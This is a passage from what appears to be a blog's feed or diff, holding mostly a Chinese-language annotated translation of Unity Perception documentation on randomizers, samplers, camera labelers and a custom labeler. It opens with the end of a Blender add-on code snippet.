    s = self.scale

    bpy.ops.mesh.primitive_cube_add()
    obj = bpy.context.object
    obj.name = t
    obj.scale[0] = s[0]
    obj.scale[1] = s[1]
    obj.scale[2] = s[2]

    return {'FINISHED'}


    def invoke(self, context, event):

    return context.window_manager.invoke_props_dialog(self)


    addon_keymaps = []


    def register():
    bpy.utils.register_class(WM_OT_myOp)

    wm = bpy.context.window_manager
    kc = wm.keyconfigs.addon
    if kc:
    km = kc.keymaps.new(name='3D View', space_type='VIEW_3D')
    kmi = km.keymap_items.new('wm.myop', type='F', value='PRESS', shift=True)
    addon_keymaps.append((km, kmi))


    def unregister():
    for km, kmi in addon_keymaps:
    km.keymap_items.remove(kmi)
    addon_keymaps.clear()
    bpy.utils.unregister_class(WM_OT_myOp)


    if __name__ == '__main__':
    register()

    3D View 中按下 SHIFT+F 就可以打开 dialogbox:

    jpg

    ]]>
    @@ -6431,7 +6431,7 @@ /posts/Diary-%E4%BC%BC%E4%B9%8E%E5%BE%88%E5%B9%B3%E6%B7%A1%E7%9A%84%E7%AC%AC%2013%20%E5%91%A8%E5%92%8C%E7%AC%AC%2014%20%E5%91%A8/ -
    ]]>
    +
    ]]>
    @@ -6458,7 +6458,7 @@ /posts/Unity-Perception%20Synthetic%20Data-Features%20Overview/ - 大纲

    Fundamentals

    FeatureDescription
    Perception CameraCaptures RGB images and ground truth from a Camera
    从 Camera 捕获 RGB 图像和 ground truth
    SOLO SchemaSchema for annotation, metric, and ground-truth data for the default SOLO endpoint
    SOLO 形式的 annotation, metric, ground-truth 数据
    LabelingA component that marks a GameObject and its descendants with a set of labels
    用一组标签标记 GameObject 及其子对象的组件
    Label ConfigAn asset that defines a taxonomy of labels for ground truth generation
    定义用于生成 ground truth 的标签分类的 asset
    RandomizationThe Randomization tool set lets you integrate domain randomization principles into your simulation.
    随机化
    FAQFrequently Asked Questions about common workflows and issues.
    常见问题及解答
    Legacy Perception SchemaSchema for annotation, metric, and ground-truth data for the legacy Perception endpoint
    Legacy Perception 形式的 annotation, metric, ground-truth 数据

    Labeling

    FeatureDescription
    LabelingA component that marks a GameObject and its descendants with a set of labels
    用一组标签标记 GameObject 及其子对象的组件
    [Label Config](#Label Config)An asset that defines a taxonomy of labels for ground truth generation
    定义用于生成 ground truth 的标签分类的 asset
    [Bounding Box 2D Labeler](#Bounding Box 2D Labeler)Capture 2D bounding boxes for visible labeled objects.
    捕获可见标记对象的 2D 边界框
    [Hierarchical Bounding Boxes](#Hierarchical Bounding Boxes)How to combine bounding boxes of objects with parent-child hierarchical relationships during runtime.
    如何在运行时将具有父子层次关系的对象的边界框组合在一起
    [Bounding Box 3D Labeler](#Bounding Box 3D Labeler)Capture 3D bounding boxes for visible labeled objects.
    捕获可见标记对象的三维边界框
    [Keypoint Labeler](#Keypoint Labeler)Record the screen locations of specific points on labeled objects such as keypoints on humans.
    记录标记对象上特定点的屏幕位置,例如人身上的关键点
    [Metadata Labeler](#Metadata Labeler)Reporting object-level or environment-level metadata information during runtime.
    在运行时报告对象级别或环境级别的元数据信息

    Randomization

    FeatureDescription
    RandomizationThe Randomization toolset lets you integrate domain randomization principles into your simulation.
    随机化
    ScenariosScenarios control execution flow of your simulation – how many iterations to run the simulation, what randomizers to use, etc.
    场景控制模拟的执行流程——运行模拟的迭代次数,使用什么随机化器等
    RandomizersRandomizers encapsulate specific randomization activities to perform during the lifecycle of a randomized simulation.
    随机化器封装了要在随机化模拟的生命周期中执行的特定随机化活动
    [Randomizer Tags](#Randomizer Tags)RandomizerTags are the primary mechanism by which Randomizers query for a certain subset of GameObjects to randomize within a simulation.
    RandomizerTags 是随机化器查询游戏对象的某个子集以在模拟中随机化的主要机制
    ParametersParameters are classes that utilize Samplers to deterministically generate random typed values.
    Parameters 是利用 Samplers 确定地生成随即类型值的类
    SamplersSamplers generate bounded random float values by sampling from probability distributions.
    Samplers 通过从概率分布中采样来生成有界随机浮点值

    Data Generation

    FeatureDescription
    [Perception Camera](#Perception Camera)Captures RGB images and ground truth from a Camera.
    从 Camera 捕获 RGB 图像和 ground truth
    [Dataset Capture](#Dataset Capture)Ensures sensors are triggered at proper rates and accepts data for the JSON dataset.
    确保传感器以正确的速率触发,并接受 JSON 数据集的数据
    [Output Endpoint](#Output Endpoint)Currently supported output endpoints are: No Output, Perception endpoint, and Solo endpoint.
    当前支持的输出端点有:No OutputPerception 端点和 Solo 端点
    [Metadata Labeler](#Metadata Labeler)Reporting object-level or environment-level metadata information during runtime.
    在运行时报告对象级别或环境级别的元数据信息

    资源

    ​ 原文档:com.unity.perception/index.md at main · Unity-Technologies/com.unity.perception · GitHub

    API

    Labeling

    Label Config

    Bounding Box 2D Labeler

    Hierarchical Bounding Boxes

    Bounding Box 3D Labeler

    Keypoint Labeler

    Metadata Labeler

    Randomization

    ​ Randomization 工具集集成了合成数据集中随机化的功能:

    1. 提供了用于随机化的 Parameters
    2. 提供了从 Parameters 中挑选随机值的 Samplers
    3. 提供了协调完整随机化过程的 Scenarios

    ​ 随机化的步骤:

    1. 创建 Scenario
    2. 定义 Randomizers 并将其添加到 Scenario 中
    3. 在 Randomizers 里设置好 Parameters 和 Samplers
    4. 生成用于 CV 的随机化训练数据

    Scenarios

    ​ 预先定义好的 Fixed Length Scenario 加载在场景的一个空对象中:

    jpg

    ​ Scenarios 有三个任务:

    1. 控制模拟的执行流
    2. 组织 Randomizers 列表
    3. 定义可以从构建的 Unity 播放器外部配置的设置

    ​ 默认情况下,Perception 包括一个现成的 Scenario,即 FixedLengthScenario 类。此场景针对固定数量的帧运行每次迭代,以创建指定大小的数据集。

    Scenario Lifecycle Hooks

    ​ Scenarios 有许多在执行过程中调用的生命周期挂钩。下面是一张图表,显示了典型 scenario 运行的操作序列:

    png

    JSON Configuration

    ​ 场景可以序列化为 JSON,在运行时进行修改和导入,以配置模拟行为,即使在构建了 Unity 播放器之后也是如此。默认情况下,可以使用场景检查器上的 Generate JSON Config 按钮序列化以下场景设置:

    1. Scenario 常量
    2. Randomizers 和 Parameters 上的字符串、数字和布尔字段
    3. Constant,Uniform,Normal 采样器的配置

    ​ 以下是如何使用--Scenario-config-file 将场景 JSON 配置加载到 Windows Unity 播放器的示例:.\PerceptionTutorial.exe --scenario-config-file scenarioConfiguration.json

    Implementing Custom Scenarios

    ​ 对于场景应该针对任意数量的帧运行的用例,可能需要实现自定义场景。以下是用户可能想要覆盖以实现自定义场景迭代条件的两个最常见的场景属性:

    1. isScenarioReadyToStart - 定义确定场景何时可以开始迭代的条件
    2. isIterationComplete - 定义确定场景迭代结束的条件
    3. isScenarioComplete - 定义确定场景停止迭代的条件

    Abstract Scenario Classes

    ​ 在派生自定义场景时,根据您的需求,有两个抽象场景类可供选择。以下是这些选项的列表,以及何时可以为您的用例派生它们:

    1. Scenario<T>:如果只需要基本的场景生命周期协调工具,这是要派生的最基本的场景类
    2. PerceptionScenario<T>:感知场景抽象类为打算利用 perception 包的数据捕获工具生成数据集的场景引入了一些有用的功能。

    Scenario Constants

    ​ 常量包括配置场景生命周期设置的属性,如起始迭代值或总迭代计数。通过派生自己的常量类,您可以添加自己的自定义场景设置来配置不同的场景属性。以下是FixedLengthScenario类中使用的 Constants 类的示例:

    [Serializable]
    public class Constants : ScenarioConstants
    {
    public int totalIterations = 100;
    public int framesPerIteration = 1;
    }
    1. 请确保在常量类上包含 [Serializable] 特性。这将确保可以从 Unity inspector 正确配置常量。
    2. Scenario 类的 SerializeToJson()DeserializeFromJson() 方法可以重写以实现自定义序列化策略。

    Randomizers

    Randomizers 封装了在随机模拟执行期间要执行的特定随机化活动。例如,存在用于 spawning objects(生成对象)、repositioning(重新定位灯光)、varying the color of objects(更改对象颜色)等的 Randomizers。Randomizers 将 random parameters 公开到其 inspector interface,以进一步自定义这些变化。用户可以将一组 Randomizers 添加到 Scenario 中,以便定义模拟生命周期中要执行的随机化活动的有序列表。

    要定义一个全新的 Randomizer,请派生 Randomizer 类并实现下面一节中列出的一个或多个方法,以便在模拟运行时随机化游戏对象。

    jpg

    添加到 Scenario 类中的 Randomizer

    Randomizer Hooks

    1. OnCreate() - called when the Randomizer is added or loaded to a Scenario 将 Randomizer 添加或加载到 Scenario 时调用
    2. OnIterationStart() - called at the start of a new Scenario Iteration 在 Scenario 迭代开始时调用
    3. OnIterationEnd() - called the after a Scenario Iteration has completed 在 Scenario 迭代完成后调用
    4. OnScenarioComplete() - called the after the entire Scenario has completed 在整个 Scenario 完成后调用
    5. OnStartRunning() - called on the first frame a Randomizer is enabled 在启动 Randomizer 的第一帧调用
    6. OnStopRunning()- called on the first frame a disabled Randomizer is updated 更新第一帧时,关闭 Randomizer
    7. OnUpdate() - executed every frame for enabled Randomizers 为启用的 Randomizer 执行每帧

    Randomizer Coding Example

    ​ 以下是 Perception 软件包中包含的 rotation Randomizer 示例的代码:

    [Serializable]
    [AddRandomizerMenu("Perception/Rotation Randomizer")]
    public class RotationRandomizer : Randomizer
    {
    public Vector3Parameter rotation = new Vector3Parameter();

    protected override void OnIterationStart()
    {
    var taggedObjects = tagManager.Query<RotationRandomizerTag>();
    foreach (var taggedObject in taggedObjects)
    taggedObject.transform.rotation = Quaternion.Euler(rotation.Sample());
    }
    }

    Randomizer Library


    Light Randomizer:以所有绑定 Light RandomizerTag 的对象为目标。

    Light Randomizer Tag:必须绑定在有 Light 组件的 GameObject 上。

    ​ 可以随机化的参数:

    1. 可以开关的可能性
    2. 灯光强度
    3. 灯光温度
    4. 灯光颜色

    Material Property Randomizer(材质特性随机化器): 以所有绑定 Material Property Randomizer Tag 的对象为目标。

    Material Property Randomizer Tag: 必须绑定在有一种 Renderer(MeshRenderer, BillboardRenderer 等)组件的 GameObject 上。

    ​ 对于选定材质的着色器,指定要修改哪些着色器属性以及在哪些范围之间进行修改。


    Material Swapper:以所有绑定 Material Swapper Tag 的对象为目标。

    Material Swapper Tag: 必须绑定在有 Material 组件的 GameObject 上。

    ​ 给定一个材质列表,在每次迭代中,将给定 GameObject 的材质与列表中的一个采样材质进行交换。


    Scene Randomizer:给定一个场景列表,每 n 次迭代从列表中加载一个场景。

    ​ 列表中的任何 scenes 都不应具有 scenario 组件,因为一次只能有一个 scenario 组件处于活动状态。启动组件的 scenario 中指定的随机化器将持续存在,并作用于新加载的场景中的对象。


    Sky Randomizer: 以所有绑定 Skybox Randomizer Tag 的对象为目标。

    Sky Randomizer Tag: 必须绑定在有 Volume 组件(?)的 GameObject 上。


    Substance Randomizer:以所有绑定 Substance Randomizer Tag 的对象为目标。

    Substance Randomizer Tag:必须绑定在有 SubstanceGraph 组件的 GameObject 上。

    ​ 好像很高级,还不太稳定,少用吧。(没有接触过 SubstanceGraph 这个组件)


    Transform Randomizer:以所有绑定 Transform Randomizer Tag 的对象为目标。

    Transform Randomizer Tag:任何 GameObject 上都可绑定。

    1. Translation 平移
      1. 是否启用
      2. 平移范围
      3. 平移是相对平移还是绝对平移(直接设置坐标值)
    2. Rotation 旋转
      1. 是否启用
      2. 旋转范围
      3. 旋转是相对旋转还是绝对旋转(直接设置旋转角)
    3. Scale 缩放
      1. 是否启用
      2. 缩放范围
      3. Uniformly scaled?(是否所有轴都具有相同的随机化值)
      4. 缩放是相对缩放还是绝对缩放(直接设置缩放值)

    Volume Randomizer:以所有绑定 Volume Randomizer Tag 的对象为目标。

    Volume Randomizer Tag:必须绑定在有 Volume 组件的 GameObject 上。


    ​ 从可用的后处理效果列表中,可以随机化哪些效果以及每个后处理效果的特定参数。

    1. Bloom–阈值、强度、散射

    2. 曝光 Exposure–补偿

    3. 景深 Depth of Field–近焦起点和终点,远焦起点和末端

    4. 相机类型 Camera Type–相机规格列表(焦距、传感器尺寸、镜头偏移、门配合等)

    5. 运动模糊 Motion Blur–强度、最小速度、最大速度

    6. 镜头失真 Lens Distortion–强度、X和Y倍增、中心、比例

    Randomizer Tags

    RandomizerTags 是随机化器查询游戏对象的某个子集以在模拟中随机化的主要机制。更具体地说,RandomizerTags 是可以添加到 GameObjects 的组件,以便在活动场景的 TagManager 中注册它们。该 TagManager 可以识别场景中所有带有标记的对象,并且可以查询以查找包含特定标记的所有 GameObjects。下面是一个简单的示例,ColorRandomizer 使用 ColorRandomizerTag 查询所有游戏对象,它将对其应用随机材质基础颜色:

    [Serializable]
    [AddRandomizerMenu("Perception/Color Randomizer")]
    public class ColorRandomizer : Randomizer
    {
    static readonly int k_BaseColor = Shader.PropertyToID("_BaseColor");

    public ColorHsvaParameter colorParameter;

    protected override void OnIterationStart()
    {
    var taggedObjects = tagManager.Query<ColorRandomizerTag>();
    foreach (var taggedObject in taggedObjects)
    {
    var renderer = taggedObject.GetComponent<MeshRenderer>();
    renderer.material.SetColor(k_BaseColor, colorParameter.Sample());
    }
    }
    }

    ​ RandomizerTag 还可以用于自定义随机化器如何将其随机化应用于特定游戏对象。

    Parameters

    ​ Parameters 通常被定义为 Randomizer 类的字段,但它们也可以像任何其他 C# 类一样实例化:

    // Create a color Parametervar
    var colorParameter = new HsvaColorParameter();
    // Generate one color sample
    var color = colorParameter.Sample();

    ​ 请注意,Parameters 与 Samplers 一样,为 Sample() 方法的每次调用生成新的随机值:

    var color1 = colorParameter.Sample();
    var color2 = colorParameter.Sample();
    Assert.AreNotEqual(color1, color2);

    ​ 所有参数都派生自 Parameter 抽象类。此外,Perception 软件包类型中包含的参数源自两个专门的参数基类:

    1. CategoricalParameter 类别参数
    2. CategoricalParameter 数值参数

    ​ **在 Randomizers 以外使用 Parameters(MonoBehaviours and ScriptableObjects): **将公共参数字段添加到 MonoBehaviorScriptableObject 后,您可能已经注意到参数的 UI 看起来与添加到随机化器时不同。这是因为大多数 Perception 随机化组件的 Inspector UI 都是使用 Unity 相对较新的 UI Elements 框架编写的,尽管在默认情况下,Unity 使用旧的 IMGUI 框架来呈现默认的检查器编辑器。

    假设您有以下具有公共 GameObjectParameter 字段的 CustomMonoBehavior

    using UnityEngine;
    using UnityEngine.Perception.Randomization.Parameters;

    public class CustomMonoBehaviour : MonoBehaviour
    {
    public GameObjectParameter prefabs;
    }

    ​ **Categorical Parameters: **Categorical Parameters 从没有内在排序的选项列表中选择一个值。例如,材质参数从材质选项列表中随机选择,但材质选项列表本身可以按任何特定顺序重新排列,而不会影响选定材质的分布。

    **​ Numeric Parameters: **Numeric Parameters 使用采样器生成随机化结构。查看Perception包中包含的 ColorHsvaParameter 类,了解如何实现 Numeric Parameters 的示例。

    Samplers

    Perception 包中的采样器是根据有界概率分布确定地生成随机浮点值的类。尽管 Samplers 通常与 Parameters 一起用于生成类型化随机值的数组,但采样器可以从任何普通脚本中实例化和使用。Perception 软件包中包含了一些采样器。


    **Constant Sampler: **生成一个常数:

    var sampler = new ConstantSampler();

    // set sampled value to be 25
    sampler.value = 25;

    // Generate a sample
    var sample = sampler.Sample(); // returns 25
    var sample2 = sampler.Sample(); // returns 25
    var sample3 = sampler.Sample(); // returns 25

    **Uniform Sampler: **均匀分布:

    var sampler = new UniformSampler();

    // generate values between the range 5 and 15
    sampler.range = new FloatRange(5, 15);

    // Generate a sample
    var sample = sampler.Sample(); // value between 5 and 15

    png


    **Normal Sampler: **正态分布:

    从由指定范围限定的截断正态分布生成随机样本。

    var sampler = new NormalSampler();

    // in statistics, often denoted by µ 均值
    sampler.mean = 10;
    // in statistics, often denoted by σ 标准差
    sampler.stdDev = 2;
    // cut-off values below -20 and above 20 截断
    sampler.range = new FloatRange(-20, 20);

    // Generate a sample
    var sample = sampler.Sample();

    png


    **Animation Curve Sampler: **

    Animation Curve 是 Unity 的内置功能,而不是 Perception 里的内容。

    ​ 根据用户提供的“Animation Curve”表示的范围和概率分布对值进行采样。动画曲线的 X 轴对应于该采样器将从中拾取的值,而 Y 轴对应于这些值的相对概率。相对概率(Y 轴)不需要在 1 时最大化,因为只有曲线的形状才重要。然而,Y 值不能为负(即可能为负的值)。

    var sampler = new AnimationCurveSampler();

    // create an animation curve programattically
    sampler.distributionCurve = AnimationCurve.EaseInOut(0, 1, 1, 100);

    // Generate a sample
    var sample = sampler.Sample();

    ​ 通过在 Inspector 中公开上面的 Sampler 变量并使用 Unity 的 UI 在曲线上添加和编辑点,可以更容易地创建动画曲线。

    // Unity UI handles curve creation
    public AnimationCurve myDistributionCurve;

    ...

    void myFunction() {
    var sampler = new AnimationCurveSampler();

    // public variable containing the AnimationCurve
    sampler.distributionCurve = myDistributionCurve;

    // Generate a sample
    var sample = sampler.Sample();
    }

    Sampler 生成由活动场景的当前随机状态设定种子的随机值。更改场景的随机种子将导致 Sampler 生成不同的值。更改 SamplerParametersRandomizers的顺序也会导致在模拟过程中采样不同的值。建议用户不要在模拟中使用 UnityEngine.Rom 类或 System.random 类生成随机值,因为这两个类都可能生成不确定或种子不正确的随机值。仅使用 Perception 采样器生成随机值将有助于确保 Perception 模拟在本地执行期间和云中的 Unity 模拟上生成一致的结果。

    Perception Camera

    Perception Camera 组件是绑在 Camera 上的:

    jpg

    Properties

    Property:Function:
    DescriptionA description of the Camera to be registered in the JSON dataset.
    要在 JSON 数据集中注册的 Camera 的描述。
    Show VisualizationsDisplay realtime visualizations for labelers that are currently active on this camera.
    显示此 camera 上当前活动的 labelers 的实时可视化。
    Capture RGB ImagesWhen you enable this property, Unity captures RGB images as PNG files in the dataset each frame.
    启用此属性时,Unity 会在每帧的数据集中捕获 RGB 图像作为 PNG 文件。
    Capture Trigger ModeThe method of triggering captures for this camera. In Scheduled mode, captures happen automatically based on a start frame and frame delta time. In Manual mode, captures should be triggered manually through calling the RequestCapture method of PerceptionCamera.
    触发此 camera 捕获的方法。在 Scheduled(计划)模式下,捕获会根据开始帧和帧增量时间自动进行。在 Manual(手动)模式下,应通过调用 PerceptionCameraRequestCapture 方法手动触发捕获。
    Override Layer MaskWhen this property is enabled, labelers will utilize the layer mask on the Perception Camera instead of the culling mask on the camera when rendering objects during data capture. This override particularly affects object culling during segmentation image rendering.
    启用此属性后,在数据捕获期间渲染对象时,labelers 将使用 Perception Camera 上的 layer mask,而不是相机上的 culling mask。此覆盖特别影响分割图像渲染过程中的对象剔除。
    Sensor TypeThe Camera Sensor selected for producing pixel based ground truth data.
    为生成基于像素的 ground truth 数据而选择的摄像机传感器。
    Layer MaskThe layer mask used by labelers when the Override Layer Mask field is enabled.
    启用 Override Layer Mask 字段时,labelers 使用的层遮罩。
    Alpha ThresholdThe minimum level of transparency required for a pixel to be rendered in segmentation images.
    在分割图像中渲染像素所需的最低透明度级别。
    Camera LabelersA list of labelers that generate data derived from this Camera.
    从该相机生成数据的 labelers 列表。

    Properties for Scheduled Capture Mode

    Property:Function:
    Simulation Delta TimeThe simulation frame time (seconds) for this camera.
    此相机的模拟帧时间(秒)。
    E.g. 0.0166 translates to 60 frames per second.
    例如,0.0166 转换为每秒 60 帧。
    This will be used as Unity’s Time.captureDeltaTime, causing a fixed number of frames to be generated for each second of elapsed simulation time regardless of the capabilities of the underlying hardware. For more information on sensor scheduling, see DatasetCapture.
    导致无论底层硬件的功能如何,每秒经过的模拟时间都会生成固定数量的帧。
    First Capture FrameFrame number at which this camera starts capturing.
    此相机开始拍摄时的帧序号。
    Frames Between CapturesThe number of frames to simulate and render between the camera’s scheduled captures. Setting this to 0makes the camera capture every frame.
    在摄影机的计划捕获之间要模拟和渲染的帧数。将此设置为 0 将使相机捕捉每一帧。

    Properties for Manual Capture Mode

    Property:Function:
    Affect Simulation TimingHave this camera affect simulation timings (similar to a scheduled camera) by requesting a specific frame delta time. Enabling this option will let you set the Simulation Delta Time property described above.
    通过请求特定的帧增量时间,使此摄影机影响模拟计时(类似于 scheduled camera)。启用此选项可以设置上述 Simulation Delta Time 属性。

    Output Resolution

    使用 Unity Editor 生成数据集时,Perception Camera 生成的图像的分辨率将与编辑器的游戏视图设置的分辨率相匹配。但是,使用 built players 生成的图像(包括 local builds 和 Unity Simulation runs)将使用项目设置中指定的分辨率。(这句话应该是指编译后的程序?)

    jpg

    Unity Editor

    jpg

    Resolution and Presentation

    Accumulation

    Accumulation 允许您使用需要多个帧才能获得最终结果的渲染技术。例如路径跟踪或累积运动模糊。

    Camera Sensors

    可以为 Perception Cameras 实现自定义相机传感器,以控制如何为所有支持的通道类型(RGB、实例分割、法线、深度等)执行渲染。可以使用 Perception Camera 组件检查器中的 Sensor Type 字段配置为 Perception 相机选择的特定传感器。

    Unity Camera Sensor

    Unity 摄像头传感器是 Perception Cameras 上选择的默认传感器。这种传感器类型使用户能够捕获 Perception camera 游戏对象上配置的摄像头组件输出的数据。该传感器上的“超级采样因子”字段通知相机以原始宽度和高度的 2 倍、4 倍或 8 倍(分别为分辨率的 4 倍、16 倍或 64 倍)捕获图像,以执行高质量的超级采样抗锯齿(SSAA)效果。该效果使用子像素平均来生成更平滑的输出图像,渲染几何体边缘周围的混叠伪影更少,有时纹理中的小细节周围的混迭也会得到改善。请注意,无论该传感器上配置的特定超级采样设置如何,该传感器的输出分辨率都不会改变。

    Camera Labelers

    Camera labelers 在 JSON 数据集中捕获与相机相关的数据。您可以使用这些数据来训练模型和进行数据集统计。Perception 软件包提供了多个 CameraLabeler,您可以从 CameraLabeler 类派生来定义更多的 labelers。

    Semantic Segmentation Labeler

    png

    SemanticSegmentationLabeler 使用附加的 Camera 生成 2D RGB 图像。Unity 使用 SemanticSegmentationLabelingConfiguration 中与标签关联的颜色绘制对象。如果 Unity 找不到对象的标签,它会将其绘制为黑色。

    Instance Segmentation Labeler

    **Instance Segmentation Labeler(实例分割标注器)**使用附加的摄影机生成 2D RGB 图像。Unity 使用唯一的颜色绘制标记对象的每个实例。

    Bounding Box 2D Labeler

    png

    BoundingBox2DLabeler 为每个具有在 IdLabelConfig 中定义的标签的可见对象生成二维边界框。Unity 使用渲染图像计算边界框,因此它仅排除对象的遮挡部分或框外部分

    Bounding Box 3D Labeler

    Bounding Box 3D Labeler 为场景中每个标记的游戏对象生成 3D 地面实况边界框。与 2D 边界框不同,3D 边界框是根据场景中标记的网格计算的,并且会记录所有对象(与它们的遮挡状态无关

    ***注意:***边界框 3D Labeler 仅支持非嵌套蒙皮网格渲染器对象。

    Object Count Labeler

    {
    "label_id": 25,
    "label_name": "drink_whippingcream_lucerne",
    "count": 1
    }

    ObjectCountLabeler 记录您在 IdLabelConfig 中定义的每个标签的对象计数。Unity 仅记录 Camera 帧中至少有一个可见像素的对象。

    Rendered Object Info Labeler

    {
    "label_id": 24,
    "instance_id": 320,
    "visible_pixels": 28957
    }

    RenderedObjectInfoLabeler 记录相机图像中可见的所有对象的列表,包括它们的实例 ID、解析的标签 ID 和可见像素计数。如果 Unity 无法将对象解析为 IdLabelConfig 中的标签,则不会记录这些对象。

    Keypoint Labeler

    **Keypoint labeler(关键点标注器)**捕捉已标记游戏对象上特定点的屏幕位置。此 Labeler 的典型用途是捕捉人体姿态估计数据,但它可以用于捕捉任何类型对象上的点。Labeler 使用关键点模板,该模板定义要为模型捕获的关键点以及这些关键点之间的骨架连接。关键点的位置记录在像素坐标中。

    Occlusion Labeler

    {
    "instanceId": 1,
    "percentVisible": 0.25,
    "percentInFrame": 0.5,
    "visibilityInFrame": 0.5
    }

    **Occlusion Labeler(遮挡标注器)**为帧内可见的每个对象报告一组可见性度量。每组包含 3 个指标:

    1. 可见百分比 Percent Visible:对象的可见部分。
    2. 帧内百分比 Percent In Frame:对象未被摄影机帧遮挡的部分。
    3. 帧内可见性 Visibility In Frame:帧内对象部分的未遮挡部分。
    4. $percentVisible = percentInFrame\times visibilityInFrame$

    Depth Labeler

    "annotations": [
    {
    "@type": "type.unity.com/unity.solo.DepthAnnotation",
    "id": "Depth",
    "sensorId": "camera",
    "description": "Generates a 32-bit depth image in EXR format where each pixel contains the actual distance in Unity units (usually meters) from the camera to the object in the scene.",
    "imageFormat": "Exr",
    "dimension": [
    736.0,
    483.0
    ],
    "filename": "step0.camera.Depth.exr"
    }
    ]
    深度帧的度量输出示例

    **Depth Labeler(深度标注器)**以 EXR 格式输出 32 位深度图像。每个像素包含从摄影机到场景中对象的实际距离,单位为 Unity units(通常为米)。深度值直接写入 R 通道。

    深度图可以用 RenderDoc 软件来打开。

    Normal Labeler

    "annotations": [
    {
    "@type": "type.unity.com/unity.solo.NormalAnnotation",
    "id": "Normal",
    "sensorId": "camera",
    "description": "Produces an image capturing the vertex normals of objects within the frame.",
    "imageFormat": "Exr",
    "dimension": [
    736.0,
    483.0
    ],
    "filename": "step0.camera.Normal.exr"
    }
    ]

    **Normal Labeler(法线标注器)**捕捉 3 通道图像中对象的顶点法线。此法线图像使用 EXR 格式进行编码。图像的 RGB 通道分别存储每个顶点法线像素的 XYZ 分量。

    Environment Labeler

    **Environment Labeler(环境标签器)**生成有关场景环境的信息,例如其标记对象的层次。

    Available Information

    标签层次结构(Label Hierarchy)–标签层次结构(JSON 中的 hierarchy 字段)提供了由实例 ID 唯一标识的标记对象之间的父子关系。用户可以决定是只为可见对象生成标签层次,还是为场景中的所有对象生成标签层级。禁用的对象始终被忽略。

    Annotation Example
    {
    "@type": "type.unity.com/unity.solo.EnvironmentStateMetric",
    "id": "environment",
    "sensorId": "",
    "annotationId": "",
    "description": "Captures details about the environment such as label hierarchy",
    "hierarchy": [
    {
    "instance_id": 1,
    "parent_instance_id": null,
    "child_instance_ids": [ 3, 4]
    },
    {
    "instance_id": 5,
    "parent_instance_id": 2,
    "child_instance_ids": []
    },
    {
    "instance_id": 2,
    "parent_instance_id": null,
    "child_instance_ids": [5]
    }
    ]
    }

    Pixel Position Labeler

    Pixel Position Labeler 以像素输出从摄影机到对象的摄影机空间距离。输出是 EXR 格式的图像文件,对每个像素进行以下编码。想象一个向量 $v_{AB}=(x,y,z)$,从相机到像素 $(A,B)$ 的

    红色通道–向量 $v_{AB}$ 的 $x$ 分量

    绿色通道–向量 $v_{AB}$ 的 $y$ 分量

    蓝色通道-向量 $v_{AB}$ 的 $z$ 分量

    Alpha 通道–始终设置为 1

    Metadata Labeler

    在帧的末尾,这个 labeler 从场景中的所有 MetadataTags 中获取数据,并将其记录到结果 JSON 中的 metadata 部分。

    Included metadata tags
    • LabelingNameMetadataTag
      • 添加有关 GameObject 名称的信息
      • 如何添加数据的简单示例 Frame JSON 数据
    • LabelingTagMetadataTag
      • 添加有关 GameObject 标签的信息
      • 添加数据的一个简单示例 Frame JSON 数据
    • LightMetadataTag
      • 添加有关灯光强度和颜色的信息
      • 这是如何注入场景相关的示例帧 JSON 数据中的信息
    • LabelingChildNameMetadataTag
      • 将子对象的名称报告给父数据
      • 如何将不同对象的数据分组到同一报告的示例
    • LabelingDistanceToMainCameraMetadataTag
      • 报告从游戏对象到主相机的距离
      • 如何对报告进行任何 Unity Engine 计算的简单示例
    • LabelingKeyValuesMetadataTag
      • 增加了通过 Unity 编辑器添加自定义字符串的可能性
      • 这是如何通过 Unity Editor 添加自定义信息的示例
    • LabelingTransformDataMetadataTag
      • -添加了关于 GameObject 转换的信息
      • 这是一个如何添加选择信息的可能性的示例,以包括在 Unity Editor 中的 Frame JSON 数据中
    1. 继承 LabelMetadataTag

    2. 实现所需的抽象方法

      2.1 键-序列化 JSON 文件中对象的名称

      2.2 GetReportedValues(IMessageBuilder-builder)-通过 builder 将此处所需的任何信息添加到 builder 中。add(“object_name”,data_to_be_addd>)。将组件添加到带有标签的 GameObject 组件

    3. 将组件添加到带有标签的 GameObject 组件

    Limitations

    ​ ground truth 并不与所有渲染功能兼容,尤其是那些修改帧中对象的可见性或形状的渲染功能。

    生成 ground truth 时:

    • Unity 不运行顶点和几何体着色器
    • Unity 不会运行后处理效果,HDRP 中的内置镜头失真除外

    Dataset Capture

    DatasetCapture 跟踪 sensorsannotationsmetrics,并将数据传递到激活的 endpoint。它还控制每帧经过的模拟时间,以适应激活的 sensors


    这段代码是一个自定义的相机标记器 CameraLabeler,用于在场景中添加标记 labels 和测量 metrics ,以用于训练和评估模型。

    在 Perception Camera 中,Label 通常用于标记场景中的物体,如人、车、建筑等,以及它们的属性,如类别、大小、颜色等等。这些信息可以通过标记器(labeler)进行添加或修改,并且可以用于训练和评估机器学习模型。

    而 Metric 则是用于测量场景中某些物理量或者训练和评估过程中的指标,如灯光的位置、物体的速度、模型的精度等等。这些信息可以被记录下来,以便后续对场景展开更深入的数据分析和挖掘。相比于 Label,Metric 更关注于数值上的精确度和可重复性,可以帮助开发者更好地分析和改进算法表现。

    总之,Label 是场景中物体的标记,而 Metric 是场景中物理量或者模型性能的测量。两者各有不同的应用场景和意义,但都可以作为机器学习和计算机视觉任务的关键信息来源。

    using System;
    using UnityEngine;
    using UnityEngine.Perception.GroundTruth;
    using UnityEngine.Perception.GroundTruth.DataModel;
    using UnityEngine.Rendering;

    public class CustomLabeler : CameraLabeler // 定义了 CustomLabeler 类,继承自 CameraLabeler
    {
    // 重写了 description、labelerId 和 supportsVisualization 属性
    public override string description => "Demo labeler";
    public override string labelerId => "Demo labeler";
    protected override bool supportsVisualization => false;

    // 创建了一个公共的 GameObject 类型的变量 targetLight 和 target,分别表示需要标记的灯光和物体的信息
    public GameObject targetLight;
    public GameObject target;

    // 定义了一个 MetricDefinition 类型的变量 lightMetricDefinition 和一个 AnnotationDefinition 类型的变量 targetPositionDef,分别表示灯光的度量标准和物体位置的注释定义
    MetricDefinition lightMetricDefinition;
    AnnotationDefinition targetPositionDef;

    // 新定义了一个 AnnotationDefinition 子类 TargetPositionDef,用于表示物体在相机空间中的位置
    class TargetPositionDef : AnnotationDefinition
    {
    // 构造函数:接受一个字符串类型的 ID 作为参数,用于初始化注释定义实例
    public TargetPositionDef(string id)
    : base(id) { }

    // 成员变量 modelType:表示注释定义所属的模型类型,是一个只读字符串属性,该属性指定了该注释定义的类型
    public override string modelType => "targetPosDef";
